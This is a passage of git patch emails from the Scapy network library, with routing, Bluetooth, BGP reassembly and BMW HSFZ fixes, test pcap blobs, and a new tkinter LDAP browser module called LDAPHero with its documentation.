zK^Q~^LMGv2T9r+rd;9l*4Nl@R>6qn2hd-vi`!x#UDB;$Cs>tXy00+~Z*fvT%^cK=d zR(MWIs|XSzzb(3a^?Ko!(BNuNHBSg)=1#BodA!i*$sn_saGp}9K|gH84dpR-Yl}Lf zntXU(ILBNnC-an{T_3^9)KJY8@R_RzJx%6}vo qHHt!1{t*u#nN8HwXl&DD3w0Hi%XgV}94ZJFv5hFamPzpP1poknrs`Dy literal 0 HcmV?d00001 diff --git a/test/pcaps/psp_v4_encrypt_transport_crypt_off_256.pcap.gz b/test/pcaps/psp_v4_encrypt_transport_crypt_off_256.pcap.gz new file mode 100644 index 0000000000000000000000000000000000000000..0661915d5c83bf6d98bf46ce601e324484ed958c GIT binary patch literal 1581 zcmV+|2GaQ-iwFqBD>rBW18{S2Uv@NKWo~0~d2n=JbaG*Cb8v5RbYEj~d2n=JZ)Rp+ zGBq|XaARR`00HU+75db}vY`S11ONa400000001^400031000RSGGZfH3;@Cf006=T z0001pnX0=003tI)RR9P8MF0h~002M$KoKD~3IG5B3IG5CeW?TJ1)u-`5di@Onlx5; z0000000001D`!^D697Qi(+=4B!yO_M(ey* z#hR6_{Gjy4NA;?WI`EMdS1aFx^l>?jeab`{=4Kk1V^2r4c+aXr)`VQ{|)>pCBaH|%{9U-fsU$6Nx47jbitUX-7cCX|3L&?_#P4?%-5y3#SSs%#~K(E^pmn~{QVB{?(kw{^237LlpkT|;2KBVt}U?sMo|@u zFm`U$xql|6rMyb(*K^jI^o*9WRj^s>5)_WMpoI!`yp?+f4^+tFeqC?4j3uxRyj;j_ zvmi6~-#6fmQtO8SX2?lIusgr9Zz+5Ij-d$ng2&LW?$=Z(+g@h7F6d!&6*N7$r1dz= zBDaA>Y>d#$E+#Fudb;#OEbo!vaeAu5)$`9UKhu%GWz}B1YA~dRbanj%EKF8Qb;%Vl z*qVMhqpvZPQ)yt?cvV8`NZCsOJl1g4v(xJ{HM18|tpT%YOzPkZs`Q9Ce~LYqtdbev znXv-$uR~wexGz2-1_dQ3?v&i6DH@!>>@y6ab{y;toFQ+UQ-u@d7f~0REBTCquJ?lT zWB=qitc-Q#cKTn?xcgB*!%W0e{$NA!z%D^K?|cio&o#m3PvK*!ck8=rMsH%F>(u*pMe)34~6aX}agFZ#y zS$@S^kWPrDNp*93-zt3?t4sDl|7J(_>UG|{TsB~UU$LSh-O9o*%^R``UvtKMPMR~I zjl|I*6+RJesa>^b?=@)CorvDM2;}8i2P10C+{>dsKr`#Ba?_~zxo_A=C_}+^H4>&< zQ}dha)866H%6R>8=siJB1un`&Gy~-UpIpSnb)zJ`tpTQK*G6+54!Mt2>(Cyiq*96d ztt)6DM^5(5s-rMI6dFvxsrNG`Q!#Ma9Esx=H-d(E>RiV z^EqvcWq5?|V*1dcPhwwtZ9yNQhxN|n5slYL7yb-e_WsL97!TNrLtogm`6P%pl#7Fr znM5OYsbBjw?MwN=57t64^Gcs$uG}CWu=nq7&7607T$qfsOPM#^#QnzFDL!_g8Bv}H zJVlK+k?=!RlPUJV+B;AbknaKiXQz=l2Tf#bA~V*<=hDM9M-v$KL~ z@`nHwjU&RIoGTil(Lg^%psxgf_z%ES@uoXZwR7sZFldY>IR;sk;E@*7#j7q+t2t^W fFSiDI_7;8=bMqR2ckorj9>G1gKz0U{>IDD*(tPaX literal 0 HcmV?d00001 From 114ad9addac45840dce9936211798a7c0d8bb319 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 29 May 2025 17:14:07 +0200 Subject: [PATCH 1483/1632] Fix conf.route.route() on linux (#4753) --- scapy/route.py | 2 +- test/regression.uts | 6 +++--- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/scapy/route.py b/scapy/route.py index 9e078bfbbc7..3c2227be834 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -203,7 +203,7 @@ def route(self, dst=None, dev=None, verbose=conf.verb, _internal=False): if dev is not None and i != dev: continue aa = atol(a) - if aa == atol_dst: + if aa == atol_dst and aa != 0: paths.append( (0xffffffff, 1, (conf.loopback_name, a, "0.0.0.0")) # noqa: E501 ) diff --git a/test/regression.uts b/test/regression.uts index 5fe21e23219..a057f80d6ba 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1840,7 +1840,7 @@ finally: sck.close() = Sending and receiving an ICMPv6EchoRequest -~ netaccess ipv6 +~ netaccess ipv6 needs_root def _test(): with no_debug_dissector(): x = sr1(IPv6(dst="www.google.com")/ICMPv6EchoRequest(),timeout=3) @@ -3414,13 +3414,13 @@ try: (3232235775, 4294967295, '0.0.0.0', 'enp3s0', '2.2.2.2', 281), (3232235639, 4294967295, '0.0.0.0', 'enp3s0', '3.3.3.3', 281), (3232235520, 4294967040, '0.0.0.0', 'enp3s0', '4.4.4.4', 281), - (0, 0, '192.168.0.254', 'enp3s0', '192.168.0.119', 25) + (0, 0, '192.168.0.254', 'enp3s0', '0.0.0.0', 25) ] assert conf.route.route("192.168.0.0-10") == ('enp3s0', '4.4.4.4', '0.0.0.0') assert conf.route.route("192.168.0.119") == ('lo', '192.168.0.119', '0.0.0.0') assert conf.route.route("224.0.0.0") == ('enp3s0', '1.1.1.1', '0.0.0.0') assert conf.route.route("255.255.255.255") == ('enp3s0', '192.168.0.119', '0.0.0.0') - assert conf.route.route("*") == ('enp3s0', '192.168.0.119', '192.168.0.254') + assert conf.route.route("*") == ('enp3s0', '4.4.4.4', '192.168.0.254') finally: conf.loopback_name = old_loopback conf.iface = old_iface From c4a5756db245064abaa7f81c83b57cd9003f3e11 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 29 May 2025 17:16:49 +0200 Subject: [PATCH 1484/1632] Fix send_command in BluetoothUserSocket (#4754) --- scapy/layers/bluetooth.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index fb939b3e4d4..6885fb4f607 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -3128,7 +3128,7 @@ def __init__(self, adapter_index=0): sock_address=sa) def send_command(self, cmd): - opcode = cmd.opcode + opcode = cmd[HCI_Command_Hdr].opcode self.send(cmd) while True: r = self.recv() From 022454206ab51ca90b65caa70bb91fa9301ddf63 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 29 May 2025 17:32:13 +0200 Subject: [PATCH 1485/1632] Ignore critical layers from filter() (#4755) --- scapy/config.py | 6 ++++++ test/regression.uts | 3 +++ 2 files changed, 9 insertions(+) diff --git a/scapy/config.py b/scapy/config.py index 8cfd828673d..a6a406fa979 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -294,6 +294,12 @@ def __repr__(self): def register(self, layer): # type: (Type[Packet]) -> None self.append(layer) + + # Skip arch* modules + if layer.__module__.startswith("scapy.arch."): + return + + # Register in module if layer.__module__ not in self.ldict: self.ldict[layer.__module__] = [] self.ldict[layer.__module__].append(layer) diff --git a/test/regression.uts b/test/regression.uts index a057f80d6ba..2dfae7dd044 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -288,6 +288,9 @@ pkt = NetflowHeader()/NetflowHeaderV5()/NetflowRecordV5() conf.layers.filter([NetflowHeader, NetflowHeaderV5]) assert NetflowRecordV5 not in NetflowHeader(bytes(pkt)) +# Conf.ifaces.reload() should still work (arch/* is exempt) +conf.ifaces.reload() + conf.layers.unfilter() assert NetflowRecordV5 in NetflowHeader(bytes(pkt)) From 6c658dd6d3edcaed744c8e4cbee43379de20fb33 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 29 May 2025 18:28:20 +0200 Subject: [PATCH 1486/1632] BGP: support tcp_reassemble (#4756) --- doc/scapy/usage.rst | 2 ++ scapy/contrib/bgp.py | 26 ++++++++++++++++++++++---- test/contrib/bgp.uts | 7 +++++++ test/pcaps/bgp_fragmented.pcap.gz | Bin 0 -> 1173 bytes 4 files changed, 31 insertions(+), 4 deletions(-) create mode 100644 test/pcaps/bgp_fragmented.pcap.gz diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index a6e14a84fcc..0a5bb16da2b 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -847,6 +847,8 @@ The ``data`` argument is bytes and the ``metadata`` argument is a dictionary whi - ``metadata.get("tcp_psh", False)``: will be present if the PUSH flag is set - ``metadata.get("tcp_end", False)``: will be present if the END or RESET flag is set +If ``tcp_reassemble`` **returns any padding**, it will be kept for the next payload. + Filters ------- diff --git a/scapy/contrib/bgp.py b/scapy/contrib/bgp.py index d8564a9b795..0060e5f9f32 100644 --- a/scapy/contrib/bgp.py +++ b/scapy/contrib/bgp.py @@ -461,6 +461,17 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return _bgp_dispatcher(_pkt) + @classmethod + def tcp_reassemble(cls, data, *args, **kwargs): + if len(data) < 18: + return None + if data[:16] == _BGP_HEADER_MARKER: + length = struct.unpack("!H", data[16:18])[0] + if len(data) >= length: + return cls(data[:length]) / conf.padding_layer(data[length:]) + else: + return cls(data) + def post_build(self, p, pay): if self.len is None: length = len(p) @@ -520,6 +531,8 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return _bgp_dispatcher(_pkt) + tcp_reassemble = BGPHeader.tcp_reassemble + def guess_payload_class(self, p): cls = None if len(p) > 15 and p[:16] == _BGP_HEADER_MARKER: @@ -755,7 +768,8 @@ class ORFTuple(Packet): "entries", [], ORFTuple, - count_from=lambda p: p.orf_number + count_from=lambda p: p.orf_number, + max_count=20000, ) ] @@ -811,7 +825,8 @@ class BGPCapORF(BGPCapability): "orf", [], BGPCapORFBlock, - length_from=lambda p: p.length + length_from=lambda p: p.length, + max_count=20000, ) ] @@ -1910,7 +1925,8 @@ class BGPPAMPReachNLRI(Packet): ConditionalField(IP6Field("nh_v6_link_local", "::"), lambda x: x.afi == 2 and x.nh_addr_len == 32), ByteField("reserved", 0), - MPReachNLRIPacketListField("nlri", [], BGPNLRI_IPv6)] + MPReachNLRIPacketListField("nlri", [], BGPNLRI_IPv6, + max_count=20000)] def post_build(self, p, pay): if self.nlri is None: @@ -2216,7 +2232,8 @@ class BGPUpdate(BGP): BGPPathAttr, length_from=lambda p: p.path_attr_len ), - BGPNLRIPacketListField("nlri", [], "IPv4") + BGPNLRIPacketListField("nlri", [], "IPv4", + max_count=20000) ] def post_build(self, p, pay): @@ -2574,6 +2591,7 @@ class BGPORF(Packet): [], Packet, length_from=lambda p: p.orf_len, + max_count=20000, ) ] diff --git a/test/contrib/bgp.uts b/test/contrib/bgp.uts index cebb1bfafe4..3d8e30f2431 100644 --- a/test/contrib/bgp.uts +++ b/test/contrib/bgp.uts @@ -87,6 +87,13 @@ h = BGP(b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x assert h.type == BGP.OPEN_TYPE assert h.len == 19 += BGP - Test TCP reassembly +pkts = sniff(offline=scapy_path("/test/pcaps/bgp_fragmented.pcap.gz"), session=TCPSession) +assert len(pkts) == 1 +assert BGPUpdate in pkts[0] +assert len(pkts[0].nlri) == 512 +assert pkts[0].nlri[511].prefix == '91.0.177.0/24' + ############################### BGPKeepAlive ################################# + BGPKeepAlive class tests diff --git a/test/pcaps/bgp_fragmented.pcap.gz b/test/pcaps/bgp_fragmented.pcap.gz new file mode 100644 index 0000000000000000000000000000000000000000..71d84784e31bd36aad87cd5e4b1f72885cb0cab0 GIT binary patch literal 1173 zcmV;G1Zw*qiwFo7gg9sb17c@zUuJS)XKiI}bY)~NaARR`0A1BpkX%(11<5>^*pc{-+N)^5MQC{`cyfrNi%x*PT>%N3RY) zI((e&k$SYR>*`k{F$SYCI-QJ32VrE!Vge>)Y;<1ilMGb*Fd#Y9ZY6imz{Ov>a; z##Bth)XdH-%*t%c!A#7^%*?>_EWn)1&wR|wluXAmEXC3+!eT7S!YstHbh9eUu?j1* zBz;(kb`}e=1dB5db2AqkvJvaD4r{Uo8?zppusX}L8f&u_E3yKc(x1)PoNd^FE!dHr z=tWO@urvMGj&0eRt=N+F*??WyjomqrgV=|I*_Zv z1~QnFIGJ-el~Xv4qdA-tIf2tTmSZ@ILpY2>Ih#v3pG&!n%ejz?IE(8!gY&qKYq^Fq zxqyo~m)p3tt6yXw&MdMQnMupe&D`X(>_omIqiK1(#k(BjIiAIx#@*&gp5SpF;$h?` z?mzB7vKDtAd5SFMZQkH5-sD5fM9fRfMTYS?Utpf{Dsr1o_?VA8%Zt3=^P|XG9>clB z|D7LsiJ|`H8}H3)ypF8rYu@91KJYgq_|<3U7V{8ilb111F+(vMk(a!JOr~YFJ>MP3 zXC6Tw;vQqxV!rYY&(ogKvv!pC2Y8SnxW~AQ+{iuL%iXx6xWl;5xYwA4n2+4aU9>wh zhk1&pd4}7$f_6Xc-rQe4<5T1#auRnQ`HB2R79uN=xyW4PEV3QBj_gL}@-A1>&PDzr zfB6e_4#oM&_e0as&5qKk^;SU-*fiF&8lxF()xE z`JV5%8X1l(N2YTXfAR;vGrX%c{}9dphAhK_cQ){e%Hc8|7CYkH?p z{6k8)LIkre_mDnn2+d-16O^}TeO%;t7Z5OQ=+Kv`3l#(l(`eN@_}aO6!zFmjqTz zvWY1ZQ`(`VyEI5?iP93)T0;AjsVEIpt$|EIX^GMbrLoF1mT4?gUz)JAWNFE2Eo53t nOO}=_(_SXMOmk_D(w1d<%e0kbmuW5&R5$(&_WDWu=Li4*K$BSx literal 0 HcmV?d00001 From 0022dfdfb5cb0d377e259dff413ef9b1b5ff7510 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Sun, 1 Jun 2025 20:17:49 +0200 Subject: [PATCH 1487/1632] hsfz: Fix acknowledgment transfer packet structure. (#4758) --- scapy/contrib/automotive/bmw/hsfz.py | 8 ++++++-- test/contrib/automotive/bmw/hsfz.uts | 18 ++++++++++++++++++ 2 files changed, 24 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index 3ac60a5ed01..0b2b6e4e683 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -59,15 +59,19 @@ class HSFZ(Packet): IntField('length', None), ShortEnumField('control', 1, control_words), ConditionalField( - XByteField('source', 0), lambda p: p.control == 1), + XByteField('source', 0), lambda p: p._hasaddrs()), ConditionalField( - XByteField('target', 0), lambda p: p.control == 1), + XByteField('target', 0), lambda p: p._hasaddrs()), ConditionalField( StrFixedLenField("identification_string", None, None, lambda p: p.length), lambda p: p.control == 0x11) ] + def _hasaddrs(self): + # type: () -> bool + return self.control == 0x01 or self.control == 0x02 + def hashret(self): # type: () -> bytes hdr_hash = struct.pack("B", self.source ^ self.target) diff --git a/test/contrib/automotive/bmw/hsfz.uts b/test/contrib/automotive/bmw/hsfz.uts index 6b0608dbc03..c56565bade0 100644 --- a/test/contrib/automotive/bmw/hsfz.uts +++ b/test/contrib/automotive/bmw/hsfz.uts @@ -76,6 +76,24 @@ assert pkt.control == 1 assert pkt.securitySeed == b"0" * 0xfff00 += Dissect diagnostic request + +pkt = HSFZ(hex_bytes("000000050001f41022f150")) +assert pkt.length == 5 +assert pkt.control == 0x01 +assert pkt.source == 0xf4 +assert pkt.target == 0x10 + + += Dissect acknowledgment transfer + +pkt = HSFZ(hex_bytes("000000050002f41022f150")) +assert pkt.length == 5 +assert pkt.control == 0x02 +assert pkt.source == 0xf4 +assert pkt.target == 0x10 + + = Dissect identification pkt = HSFZ(bytes.fromhex("000000320011444941474144523130424d574d4143374346436343463837393343424d5756494e5742413558373333333246483735373334")) From 56de4f4363088c533d6c8753080f1a31c90115ee Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Sun, 1 Jun 2025 20:24:28 +0200 Subject: [PATCH 1488/1632] hsfz: vehicle ident string is only present in replays with non zero len. (#4757) --- scapy/contrib/automotive/bmw/hsfz.py | 2 +- test/contrib/automotive/bmw/hsfz.uts | 5 +++++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index 0b2b6e4e683..d3269e39d5f 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -65,7 +65,7 @@ class HSFZ(Packet): ConditionalField( StrFixedLenField("identification_string", None, None, lambda p: p.length), - lambda p: p.control == 0x11) + lambda p: p.control == 0x11 and p.length != 0) ] def _hasaddrs(self): diff --git a/test/contrib/automotive/bmw/hsfz.uts b/test/contrib/automotive/bmw/hsfz.uts index c56565bade0..5bd92cabd89 100644 --- a/test/contrib/automotive/bmw/hsfz.uts +++ b/test/contrib/automotive/bmw/hsfz.uts @@ -106,6 +106,11 @@ assert pkt.length == 50 assert pkt.control == 0x11 assert b"BMW" in pkt.identification_string +pkt = UDP(hex_bytes("e9811a9b000ea98f000000000011")) +assert pkt.length == 0 +assert pkt.control == 0x11 + + = Test HSFZSocket From cbb09c461382225a836a346125249d4a940e2d2d Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 5 Jun 2025 12:43:30 +0200 Subject: [PATCH 1489/1632] Publish LDAPHero (#4762) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Introduce LDAPéro * Fix tox -e docs2 * Update ldap.rst --- doc/scapy/layers/ldap.rst | 28 +- pyproject.toml | 1 + scapy/layers/ldap.py | 3 +- scapy/modules/ldaphero.py | 2043 +++++++++++++++++++++++++++++++++++++ tox.ini | 2 + 5 files changed, 2075 insertions(+), 2 deletions(-) create mode 100644 scapy/modules/ldaphero.py diff --git a/doc/scapy/layers/ldap.rst b/doc/scapy/layers/ldap.rst index 89c4adc62c9..c87a5e8dcd5 100644 --- a/doc/scapy/layers/ldap.rst +++ b/doc/scapy/layers/ldap.rst @@ -251,4 +251,30 @@ The following issues a ``Modify Request`` that replaces the ``displayName`` attr ) ) ] - ) \ No newline at end of file + ) + +LDAPHero +-------- + +LDAPHero (LDAPéro in French) is a graphical wrapper around Scapy's :class:`~scapy.layers.ldap.LDAP_Client`, that works on all plateforms. +It can be used with: + +.. code:: python + + >>> load_module("ticketer") + >>> LDAPHero() + +It's possible to pass it a SSP, which will be used when clicking the "Bind" button: + +.. code:: python + + >>> LDAPHero(mech=LDAP_BIND_MECHS.SICILY, + ... ssp=NTLMSSP(UPN="Administrator@domain.local", PASSWORD="test")) + +You can use the same examples as in `Binding <#binding>`_. + +It's also possible to pass some connection parameters, for instance to connect to a specific host, you could use: + +.. code:: python + + >>> LDAPHero(host="192.168.0.100") diff --git a/pyproject.toml b/pyproject.toml index a1b8d2423bd..501096e4ac4 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -60,6 +60,7 @@ all = [ "matplotlib", ] doc = [ + "cryptography>=2.0", "sphinx>=7.0.0", "sphinx_rtd_theme>=1.3.0", "tox>=3.0.0", diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 3fb42b7cad0..ee358de34c4 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -88,6 +88,7 @@ GSSAPI_BLOB, GSSAPI_BLOB_SIGNATURE, GSS_C_FLAGS, + GSS_C_NO_CHANNEL_BINDINGS, GSS_S_COMPLETE, GssChannelBindings, SSP, @@ -1808,7 +1809,7 @@ def __init__( self.sign = False # Session status self.sasl_wrap = False - self.chan_bindings = None + self.chan_bindings = GSS_C_NO_CHANNEL_BINDINGS self.bound = False self.messageID = 0 diff --git a/scapy/modules/ldaphero.py b/scapy/modules/ldaphero.py new file mode 100644 index 00000000000..2c162be7ce2 --- /dev/null +++ b/scapy/modules/ldaphero.py @@ -0,0 +1,2043 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +LDAP Hero: a LDAP browser based on the Scapy LDAP client +""" + +import uuid + +from scapy.layers.ldap import ( + LDAP_AttributeValue, + LDAP_BIND_MECHS, + LDAP_Client, + LDAP_CONTROL_ACCESS_RIGHTS, + LDAP_Control, + LDAP_DS_ACCESS_RIGHTS, + LDAP_Exception, + LDAP_ModifyRequestChange, + LDAP_PartialAttribute, + LDAP_PROPERTY_SET, + LDAP_serverSDFlagsControl, +) +from scapy.layers.dcerpc import ( + DCERPC_Transport, + NDRUnion, + DCE_C_AUTHN_LEVEL, + find_dcerpc_interface, +) +from scapy.layers.gssapi import SSP +from scapy.layers.msrpce.rpcclient import ( + DCERPC_Client, +) +from scapy.layers.msrpce.msdrsr import ( + DRS_EXTENSIONS_INT, + DRS_EXTENSIONS, + DRS_MSG_CRACKREQ_V1, + IDL_DRSBind_Request, + IDL_DRSCrackNames_Request, + NTDSAPI_CLIENT_GUID, +) +from scapy.layers.ntlm import NTLMSSP +from scapy.layers.kerberos import KerberosSSP +from scapy.layers.spnego import SPNEGOSSP +from scapy.layers.smb2 import ( + SECURITY_DESCRIPTOR, + WELL_KNOWN_SIDS, + WINNT_ACE_FLAGS, + WINNT_ACE_HEADER, + WINNT_SID, + WINNT_ACCESS_ALLOWED_ACE, + WINNT_ACCESS_ALLOWED_OBJECT_ACE, + WINNT_ACCESS_DENIED_OBJECT_ACE, + WINNT_ACCESS_DENIED_ACE, + WINNT_SYSTEM_AUDIT_OBJECT_ACE, + WINNT_SYSTEM_AUDIT_ACE, +) +from scapy.utils import valid_ip + +try: + import tkinter as tk + from tkinter import ttk, messagebox +except ImportError: + raise ImportError("tkinter is not installed (`apt install python3-tk` on debian)") + + +class AutoHideScrollbar(ttk.Scrollbar): + def __init__(self, *args, **kwargs): + self.shown = False + super(AutoHideScrollbar, self).__init__(*args, **kwargs) + + def set(self, first, last): + show = float(first) > 0 or float(last) < 1 + if show and not self.shown: + self.grid(row=0, column=1, sticky="nsew") + elif not show and self.shown: + self.grid_forget() + self.shown = show + super(AutoHideScrollbar, self).set(first, last) + + +class BasePopup: + """ + A tkinter wrapper used to have a popup window with basic controls + """ + + def __init__(self, parent): + # Get dialog + self.dlg = tk.Toplevel(parent) + self.parent = parent + self.cancelled = False + + # Configure some bindings + self.dlg.bind("", self.dismiss) + self.dlg.bind("", self.dismiss) + + def dismiss(self, *_) -> None: + """ + Close the popup + """ + self.dlg.grab_release() + self.dlg.destroy() + + def cancel(self) -> None: + """ + Cancel the popup + """ + self.cancelled = True + self.dismiss() + + def run(self) -> False: + """ + Show the popup. Returns True if cancelled, False otherwise. + """ + self.dlg.protocol("WM_DELETE_WINDOW", self.dismiss) + self.dlg.transient(self.parent) + self.dlg.wait_visibility() + self.dlg.grab_set() + self.dlg.wait_window() + + return self.cancelled + + +class LDAPHero: + """ + LDAP Hero - LDAP GUI browser over Scapy's LDAP_Client + + :param ssp: the SSP object to use when binding. + :param mech: the LDAP_BIND_MECHS to use when binding. + :param simple_username: if provided, used for Simple binding (instead of the 'ssp') + :param simple_password: + :param encrypt: request encryption by default (useful when using 'ssp') + :param host: auto-connect to a specific host + :param port: the port to connect to (default: 389/636) + (This is only in use when using 'host') + :param ssl: whether to use SSL to connect or not + (This is only in use when using 'host') + """ + + def __init__( + self, + ssp: SSP = None, + mech: LDAP_BIND_MECHS = None, + simple_username: str = None, + simple_password: str = None, + encrypt: bool = False, + host: str = None, + port: int = None, + ssl: bool = False, + ): + self.client = LDAP_Client() + self.ssp = ssp + self.mech = mech + self.simple_username = simple_username + self.simple_password = simple_password + self.encrypt = encrypt + # Session parameters + self.connected = False + self.bound = False + self.host = host + self.port = port + self.ssl = ssl + self.dns_domain_name = "" + self.rootDSE = {} + self.sids = dict(WELL_KNOWN_SIDS) + self.sidscombo = {} + self.guids = {} + self.guidscombo = {"None": None} + self.guidscomboobject = {"None": None} + self.loadedSchemaIDGuids = False + self.crop_output = None + self.currently_editing = None + # UI cache + self.lastSearchString = "" + # Launch + self.main() + + def connect(self): + """ + Connect command. + """ + # If host is None, we need to ask for it via a dialog. + if self.host is None: + # Get dialog + popup = BasePopup(self.root) + dlg = popup.dlg + + # Connect UI + serverv = tk.StringVar() + serverv.set(self.host or "") + ttk.Label(dlg, text="Server").grid(row=0, column=0) + serverf = tk.Entry(dlg, textvariable=serverv) + serverf.grid(row=0, column=1) + + portv = tk.StringVar() + portv.set("389") + ttk.Label(dlg, text="Port").grid(row=1, column=0) + tk.Entry(dlg, textvariable=portv).grid(row=1, column=1) + + sslv = tk.BooleanVar() + ttk.Label(dlg, text="SSL").grid(row=2, column=0) + ttk.Checkbutton(dlg, variable=sslv).grid(row=2, column=1) + + ttk.Button(dlg, text="OK", command=popup.dismiss).grid(row=3, column=0) + ttk.Button(dlg, text="Cancel", command=popup.cancel).grid(row=3, column=1) + + serverf.focus() + + # Setup + if popup.run(): + # Cancelled + return + + # Get values + self.host = serverv.get() + try: + self.port = int(portv.get()) + except ValueError: + return + self.ssl = sslv.get() + + # Connect now ! + self.tprint( + "client.connect(host='%s', port=%s, ssl=%s)" + % (self.host, self.port, self.ssl) + ) + try: + self.client.connect(self.host, port=self.port, use_ssl=self.ssl) + except Exception as ex: + self.tprint(str(ex)) + raise + self.tprint("Established connection to %s." % self.host) + self.connected = True + + # Alright, change the UI. + self.menu_connection.entryconfig("Connect", state=tk.DISABLED) + self.menu_connection.entryconfig("Bind", state=tk.ACTIVE) + self.menu_connection.entryconfig("Disconnect", state=tk.ACTIVE) + self.menu_browse.entryconfig("Add child", state=tk.ACTIVE) + self.menu_browse.entryconfig("Modify", state=tk.ACTIVE) + self.menu_browse.entryconfig("Modify DN", state=tk.ACTIVE) + self.menu_browse.entryconfig("Search", state=tk.ACTIVE) + self.menu_view.entryconfig("Tree", state=tk.ACTIVE) + + # Get rootDSE + self.tprint("Retrieving base DSA information...") + try: + results = self.client.search( + baseObject="", + scope=0, + ) + except LDAP_Exception as ex: + self.tprint( + ex.diagnosticMessage or "Error: %s" % ex.resultCode, + tags=["error"], + ) + return + + attrs = results.get("", None) # root + if attrs is None: + return + + self.rootDSE = attrs + + # Get some infos on the server + try: + self.dns_domain_name = self.rootDSE["ldapServiceName"][0].split(":")[0] + except KeyError: + pass + + # Display + self._showsearchresult("", results) + + # If we have a SSP, auto-bind. + if self.ssp is not None: + self.bind() + + def disconnect(self): + """ + Disconnect command. + """ + if not self.connected: + return + + self.tprint("client.close()") + self.client.close() + self.connected = False + + self.menu_connection.entryconfig("Connect", state=tk.ACTIVE) + self.menu_connection.entryconfig("Bind", state=tk.DISABLED) + self.menu_connection.entryconfig("Disconnect", state=tk.DISABLED) + self.menu_browse.entryconfig("Add child", state=tk.DISABLED) + self.menu_browse.entryconfig("Modify", state=tk.DISABLED) + self.menu_browse.entryconfig("Modify DN", state=tk.DISABLED) + self.menu_browse.entryconfig("Search", state=tk.DISABLED) + self.menu_view.entryconfig("Tree", state=tk.DISABLED) + + def bind(self, *args): + """ + Bind command. + """ + if not self.connected: + return + + if self.bound: + # We are re-binding ! + self.ssp = None + self.bound = False + + if self.ssp is not None or self.simple_username is not None: + # We have an SSP. Don't prompt + self.tprint("client.bind(%s, ssl=self.ssp)" % self.mech) + try: + self.client.bind( + self.mech, + ssp=self.ssp, + simple_username=self.simple_username, + simple_password=self.simple_password, + encrypt=self.encrypt, + ) + except LDAP_Exception as ex: + self.tprint( + ex.diagnosticMessage or "Error: %s" % ex.resultCode, + tags=["error"], + ) + return + except Exception as ex: + self.tprint(str(ex)) + raise + self.tprint("Authenticated.\n", tags=["bold"]) + self.bound = True + return + + # Get dialog + popup = BasePopup(self.root) + dlg = popup.dlg + + # Bind UI + userv = tk.StringVar() + ttk.Label(dlg, text="User").grid(row=0, column=0) + userf = tk.Entry(dlg, textvariable=userv) + userf.grid(row=0, column=1) + + passwordv = tk.StringVar() + ttk.Label(dlg, text="Password").grid(row=1, column=0) + tk.Entry(dlg, textvariable=passwordv).grid(row=1, column=1) + + domainv = tk.StringVar() + domainv.set(self.dns_domain_name) + ttk.Label(dlg, text="Domain").grid(row=2, column=0) + domentry = tk.Entry(dlg, textvariable=domainv) + domentry.grid(row=2, column=1) + + bindtypefrm = ttk.LabelFrame( + dlg, + text="Bind type", + ) + bindtypev = tk.StringVar() + ttk.Radiobutton( + bindtypefrm, + variable=bindtypev, + text="Sicily bind (NTLM)", + value=LDAP_BIND_MECHS.SICILY.value, + ).pack(anchor=tk.W) + ttk.Radiobutton( + bindtypefrm, + variable=bindtypev, + text="GSSAPI bind (Kerberos)", + value=LDAP_BIND_MECHS.SASL_GSSAPI.value, + ).pack(anchor=tk.W) + ttk.Radiobutton( + bindtypefrm, + variable=bindtypev, + text="SPNEGO bind (NTLM/Kerberos)", + value=LDAP_BIND_MECHS.SASL_GSS_SPNEGO.value, + ).pack(anchor=tk.W) + ttk.Radiobutton( + bindtypefrm, + variable=bindtypev, + text="Simple bind", + value=LDAP_BIND_MECHS.SIMPLE.value, + ).pack(anchor=tk.W) + bindtypefrm.grid(row=3, column=0, columnspan=2) + + encryptv = tk.BooleanVar() + encryptv.set(self.encrypt) + ttk.Label(dlg, text="Encrypt traffic after bind").grid(row=4, column=0) + encrbtn = ttk.Checkbutton(dlg, variable=encryptv) + encrbtn.grid(row=4, column=1) + + ttk.Button(dlg, text="OK", command=popup.dismiss).grid(row=5, column=0) + ttk.Button(dlg, text="Cancel", command=popup.cancel).grid(row=5, column=1) + + # Default state + if self.dns_domain_name and not valid_ip(self.host): + 